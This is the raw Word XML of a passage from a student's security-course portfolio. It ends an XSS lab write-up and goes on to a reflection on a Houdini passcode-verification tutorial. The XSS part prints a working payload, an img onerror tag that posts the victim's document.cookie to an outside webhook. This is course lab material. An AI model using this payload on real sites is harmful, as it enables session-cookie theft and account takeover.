              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Then I tried with </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>console.log(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">1) as the on error to see if that gets sanitized or not, which it didn’t, so then I found my entry point for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>javascript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="270D4AD0" w14:textId="6F7189C7" w:rsidR="00F5572B" w:rsidRDefault="00F5572B" w:rsidP="00F5572B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">I then decided to enter this </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> with a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>javascript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> forwarding session to a webhook I </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>have to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> then retrieve the cookie from the server:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="653C4F89" w14:textId="77777777" w:rsidR="00031E5F" w:rsidRDefault="00031E5F" w:rsidP="00031E5F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6512FF4B" w14:textId="0BDAB502" w:rsidR="00AE14A7" w:rsidRPr="00ED5F6D" w:rsidRDefault="00F5572B" w:rsidP="00AE14A7">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://xss5.comp6841.xyz/complaints#%3Cb%3EURL%20must%20be%20from%20xss5.comp6841.xyz%3C/b%3E%3Cimg%20src=x%20onerror=%22fetch('https://wh5ff260035b939895bf.free.beeceptor.com</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>',{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>method: '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>',headers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>: {'Content-Type': 'application/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>json</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>},body</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>decodeURIComponent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00031E5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>)})"&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00AE14A7" w:rsidRPr="00AE14A7">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E171B9" wp14:editId="730E688E">
                  <wp:extent cx="4801815" cy="3290323"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
                  <wp:docPr id="31557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71931" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId23"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4810926" cy="3296566"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3805EF94" w14:textId="0703E670" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="00F5572B" w:rsidP="42E83AC9">
            <w:r w:rsidRPr="00F5572B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BAC02F9" wp14:editId="50FACB58">
                  <wp:extent cx="5943600" cy="1924050"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1391029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29199" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId24"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="1924050"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3345DD74" w14:textId="2A037EBB" w:rsidR="42E83AC9" w:rsidRPr="00E838A9" w:rsidRDefault="00E838A9" w:rsidP="42E83AC9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E838A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>XSS 6:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BFB98AE" w14:textId="2F7D9B2F" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36149FC0" w14:textId="263CC0F7" w:rsidR="42E83AC9" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
    <w:p w14:paraId="0A97515C" w14:textId="77777777" w:rsidR="005251A5" w:rsidRDefault="005251A5" w:rsidP="42E83AC9"/>
    <w:p w14:paraId="568D4859" w14:textId="77777777" w:rsidR="005251A5" w:rsidRPr="00ED5F6D" w:rsidRDefault="005251A5" w:rsidP="42E83AC9"/>
    <w:p w14:paraId="20118911" w14:textId="472D5B30" w:rsidR="50317446" w:rsidRPr="00ED5F6D" w:rsidRDefault="46CD8C25" w:rsidP="42E83AC9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Analysis and Reflection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130579C9" w14:textId="0CD67161" w:rsidR="6C805450" w:rsidRPr="00ED5F6D" w:rsidRDefault="5C182900" w:rsidP="371C62D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidRPr="00ED5F6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Tutorial </w:t>
        </w:r>
        <w:r w:rsidR="2890882B" w:rsidRPr="00ED5F6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>3: Houdini</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w14:paraId="453D7FD1" w14:textId="77777777" w:rsidTr="181B8E52">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B8F23CD" w14:textId="77777777" w:rsidR="003032B0" w:rsidRDefault="003032B0">
            <w:pPr>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>During the tutorial, we considered how Houdini’s protocol could better verify a medium claiming to communicate with him after death.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68D1BA4E" w14:textId="77777777" w:rsidR="003032B0" w:rsidRDefault="003032B0" w:rsidP="003032B0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>We first discussed the risk of entrusting the passcode to Bess, since her personal connection made her vulnerable to social engineering. I agreed the secret should move to another mechanism, as any single person becomes a weak target that many mediums could pressure or exploit.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6442FB06" w14:textId="77777777" w:rsidR="003032B0" w:rsidRDefault="003032B0" w:rsidP="003032B0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>To reduce this risk, we proposed using a dynamic key generated for each test. This would make the code harder to break, especially if time was included to add entropy.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12D58599" w14:textId="77777777" w:rsidR="003032B0" w:rsidRDefault="003032B0" w:rsidP="003032B0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>One suggestion was to use the date and time as inputs to a Fibonacci-based algorithm that changes the spoken phrase. While stronger than a fixed passcode, it still depends on Bess knowing the method. If she revealed it, or if enough mediums tested patterns over time, the code could still be approximated, creating Type 2 error risks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63696B8A" w14:textId="77777777" w:rsidR="003032B0" w:rsidRPr="001D05E8" w:rsidRDefault="003032B0" w:rsidP="003032B0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>To counter false attempts, I proposed raising the cost of guessing by removing Bess and placing the medium in a puzzle or trap only Houdini could solve. This would discourage brute force attempts, but it risks a Type 1 error by harming a truthful medium and could still be defeated if the trap were tampered with. This showed me that both error types cannot be fully eliminated.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FFAC6EC" w14:textId="329EFF78" w:rsidR="001D05E8" w:rsidRDefault="00790B88" w:rsidP="003032B0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="160" w:line="279" w:lineRule="auto"/>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:t xml:space="preserve">Another alternative method proposed was to use the digits of </w:t>
            </w:r>
            <m:oMath>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:kern w:val="2"/>
                  <w:lang w:eastAsia="en-AU"/>
                  <w14:ligatures w14:val="standardContextual"/>
                </w:rPr>
                <m:t>π</m:t>
              </m:r>
            </m:oMath>
            <w:r>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:t xml:space="preserve"> to hash the cipher text in such a way, since currently the digits of </w:t>
            </w:r>
            <m:oMath>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:kern w:val="2"/>
                  <w:lang w:eastAsia="en-AU"/>
                  <w14:ligatures w14:val="standardContextual"/>
                </w:rPr>
                <m:t>π</m:t>
              </m:r>
            </m:oMath>
            <w:r>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:t xml:space="preserve"> are pseudorandom and hence will </w:t>
            </w:r>
            <w:r w:rsidR="005661E4">
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:t>significantly increase the entropy of the encryption system making it even harder to attempt to crack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A96993A" w14:textId="118CD246" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="4C0C3A8B" w14:textId="77A9F2C4" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="5824D917" w14:textId="78DB4C54" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="5F92C56F" w14:textId="4E6701A4" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="6F72FB4A" w14:textId="3615F003" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="12D0A47C" w14:textId="038A15B2" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="37C93A73" w14:textId="366D6F02" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="418E882A" w14:textId="2A2874F1" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="0F0DB0BA" w14:textId="46D8D1B1" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FC229BF" w14:textId="371D3543" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="371C62D3"/>
    <w:p w14:paraId="659447F6" w14:textId="0B6405E0" w:rsidR="50317446" w:rsidRPr="00ED5F6D" w:rsidRDefault="64F38000" w:rsidP="42D4980C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="270"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Wrap up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD548E" w14:textId="3B8DCC9B" w:rsidR="50317446" w:rsidRPr="00ED5F6D" w:rsidRDefault="50317446" w:rsidP="181B8E52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:t>Submission Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B53AEA" w14:textId="68559542" w:rsidR="13D4C4C5" w:rsidRDefault="13D4C4C5" w:rsidP="181B8E52">
      <w:r w:rsidRPr="00ED5F6D">
        <w:t>To submit a valid portfolio entry, complete the activities, save your work as a PDF, and upload it to the relevant week’s submission page on Moodle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FAE89A" w14:textId="77777777" w:rsidR="001D4E4C" w:rsidRDefault="001D4E4C" w:rsidP="181B8E52"/>
    <w:p w14:paraId="2D011BB3" w14:textId="77777777" w:rsidR="00AF1C36" w:rsidRDefault="00AF1C36" w:rsidP="181B8E52"/>
    <w:p w14:paraId="2482ECA3" w14:textId="77777777" w:rsidR="00AF1C36" w:rsidRDefault="00AF1C36" w:rsidP="181B8E52"/>
    <w:p w14:paraId="651FD94B" w14:textId="77777777" w:rsidR="00AF1C36" w:rsidRDefault="00AF1C36" w:rsidP="181B8E52"/>
    <w:p w14:paraId="70F02334" w14:textId="31327A35" w:rsidR="001D4E4C" w:rsidRDefault="001D4E4C" w:rsidP="181B8E52">
      <w:r w:rsidRPr="001D4E4C">
        <w:t>[1] Institute of Telecommunications, University of Stuttgart, “Channel Coding Web Demonstration,” University of Stuttgart. [Online]. Available: https://webdemo.inue.uni-stuttgart.de/webdemos/03_theses/chCoding/index.php?id=1. [Accessed: Jun. 22, 2026].</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4E4C">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001D4E4C">
        <w:br/>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4E4C">
        <w:t>Rahsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4E4C">
        <w:t>, “Understanding Quadrature Amplitude Modulation (QAM) and Its Applications,” Feb. 28, 2025. [Online]. Available: https://rahsoft.com/2025/02/28/understanding-quadrature-amplitude-modulation-qam-and-its-applications/. [Accessed: Jun. 22, 2026].</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001D4E4C">
      <w:headerReference w:type="default" r:id="rId26"/>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3DA51" w14:textId="77777777" w:rsidR="001F15FB" w:rsidRPr="00ED5F6D" w:rsidRDefault="001F15FB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="45154946" w14:textId="77777777" w:rsidR="001F15FB" w:rsidRPr="00ED5F6D" w:rsidRDefault="001F15FB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6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2D4980C" w:rsidRPr="00ED5F6D" w14:paraId="643ADC9B" w14:textId="77777777" w:rsidTr="42D4980C">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="35EEB507" w14:textId="186EAC52" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="5257BA03" w14:textId="0F9956ED" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="55A980A9" w14:textId="7FBE0784" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="00ED5F6D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00ED5F6D">
            <w:instrText>PAGE</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00ED5F6D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00901E67" w:rsidRPr="00ED5F6D">
            <w:t>1</w:t>
          </w:r>
          <w:r w:rsidRPr="00ED5F6D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="5054D1AD" w14:textId="4E52EB4D" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D498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12EB7" w14:textId="77777777" w:rsidR="001F15FB" w:rsidRPr="00ED5F6D" w:rsidRDefault="001F15FB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="13ABDB7F" w14:textId="77777777" w:rsidR="001F15FB" w:rsidRPr="00ED5F6D" w:rsidRDefault="001F15FB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6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2D4980C" w:rsidRPr="00ED5F6D" w14:paraId="118E8916" w14:textId="77777777" w:rsidTr="42D4980C">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="1EB5D365" w14:textId="591620E8" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="541F3FC1" w14:textId="72D00FD6" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="3499D55A" w14:textId="4A5FB59C" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D4980C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="49A62F83" w14:textId="1BD81BCE" w:rsidR="42D4980C" w:rsidRPr="00ED5F6D" w:rsidRDefault="42D4980C" w:rsidP="42D498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9303D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EDD24D2E"/>
    <w:lvl w:ilvl="0" w:tplc="DC32290A">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7B7B7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="16F28AC0"/>
    <w:lvl w:ilvl="0" w:tplc="545A5952">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1B4EE3E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="01E62962">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1772D078">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="05BEAA4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="900CBCEC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2236B97A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="029A3578">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="CBF2BC18">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
